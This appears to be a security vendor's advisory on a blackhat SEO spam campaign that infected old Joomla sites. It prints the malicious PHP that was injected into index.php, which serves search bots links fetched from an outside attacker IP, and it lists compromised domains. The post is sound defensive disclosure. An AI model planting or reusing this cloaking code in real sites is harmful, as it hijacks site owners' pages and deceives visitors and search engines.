Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14). This is how they show up in our scanner:

They all had the following code added to their index.php file to contact 188.72.201.11 and 209.160.33.108 to retrieve the list of links to show up:

if (preg_match(‘/live|msn|yahoo|Google|ask|aol|bot|google/’, $_SERVER[‘HTTP_USER_AGENT’])) {
$get = “http://188.72.201.11/bots.php?host=”.$_SERVER[‘HTTP_HOST’];
if (function_exists(“curl_init”)) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $get);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
echo $out;
} else {
$out = file_get_contents($get);
echo $out;
}

These are some of the sites we identified so far: (some .govs, some small banks, many russian, etc).

www.grameen.com – Grameen Bank
corteconstitucional.gov.ec – Ecuador .gov
www.lalibertad.gob.ec – Ecuador .gov
cce.gov.ec – Ecuador .gov
www.image-live.com
www.chic-association.com
morpeh.org
www.kdv-de-kangoeroe.nl
www.stm.pt
www.tocyprus.org
www.iimbaa.org
www.victrolacoffee.com
www.hhcag.org.uk
www.glenchem.com
www.buddies.pl
www.weddings-in-prague.com
sollat.eng.usm.my
www.boostconference.org

If you are using Joomla, make sure it is upgraded to avoid getting hacked. You can also check if your site is infected by scanning it in here: http://sitecheck.sucuri.net